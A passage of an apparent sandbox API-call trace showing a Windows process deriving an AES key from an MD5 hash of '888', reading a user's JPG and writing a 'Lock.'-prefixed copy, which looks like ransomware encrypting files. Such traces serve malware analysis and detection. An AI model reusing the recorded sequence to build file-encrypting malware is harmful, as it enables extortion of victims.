[0209.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.816] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bf78) returned 1 [0209.816] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0209.816] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0209.816] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.816] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.816] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0209.816] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0209.820] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.820] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.820] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.820] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.820] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.820] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.820] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.820] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.820] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.820] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab1b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0209.820] CryptCreateHash (in: hProv=0xa7bf78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0209.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.821] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ce8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.821] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.821] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0209.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab1b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0209.821] CryptHashData (hHash=0x9e1bf8, pbData=0x2a71be8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.821] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.821] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.821] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.821] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab290, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.821] CryptDeriveKey (in: hProv=0xa7bf78, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0209.821] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.821] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.822] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0209.823] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/EHKlEyoM3xoIg8ms.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ehkleyom3xoig8ms.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0209.824] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.824] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0209.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0209.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0209.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73e30 [0209.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.825] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0209.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e30 | out: hHeap=0x2af0000) returned 1 [0209.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0209.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0209.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.EHKlEyoM3xoIg8ms.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.ehkleyom3xoig8ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0209.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0209.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e6020 [0209.831] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0209.831] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0xeb64, lpOverlapped=0x0) returned 1 [0209.834] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0209.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeb64) returned 0x2aae878 [0209.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e6020 | out: hHeap=0x2af0000) returned 1 [0209.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeb64) returned 0x2abd3e8 [0209.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeb64) returned 0x2aae878 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.840] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0209.840] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0209.840] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0209.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 